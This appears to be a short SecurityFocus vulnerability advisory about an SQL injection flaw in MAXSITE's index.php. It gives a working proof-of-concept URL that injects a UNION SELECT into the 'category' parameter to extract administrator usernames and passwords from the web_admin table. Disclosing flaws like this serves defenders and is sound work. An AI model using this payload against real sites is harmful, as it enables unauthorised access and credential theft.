MAXSITE 'index.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof of concept is available:

http://www.example.com/index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*


 

Privacy Statement
Copyright 2010, SecurityFocus